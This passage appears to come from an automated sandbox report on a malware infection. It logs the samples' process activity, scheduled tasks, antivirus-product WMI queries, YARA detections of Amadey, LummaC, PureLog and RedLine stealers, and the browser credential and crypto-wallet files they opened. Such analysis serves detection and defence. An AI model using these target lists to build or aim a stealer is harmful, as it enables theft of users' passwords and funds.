Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\F6AXAma0V3l VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\F6AXAma0V3l VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\AYDt7maKkma VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\AYDt7maKkma VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\w6IsPma2wMO VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\w6IsPma2wMO VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\svchoost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\svchoost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\svchoost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\svchoost.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\2s1E7maxTOK VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\2s1E7maxTOK VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\dYTrZmaPzYS VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\dYTrZmaPzYS VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nvdZYmascmw VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\nvdZYmascmw VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\FZ9Edma36hm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\FZ9Edma36hm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: unknown VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 47_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

47_2_0000000140001B54

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F27960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

14_2_0000028559F27960

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Source: Ryu8yUx.exe, 0000000D.00000002.79069418774.0000000004046000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Ryu8yUx.exe, 0000000D.00000002.79066561966.00000000015A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mc3FDUMnVz.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.78377777271.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.78404250496.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 13.2.Ryu8yUx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Ryu8yUx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.79064100946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.0.Ryu8yUx.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.78919175290.00000000006A2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.79568618029.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Ryu8yUx.exe, 0000000D.00000002.79066561966.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Ryu8yUx.exe, 0000000D.00000002.79066561966.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000005.00000002.78893751401.00000000059F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
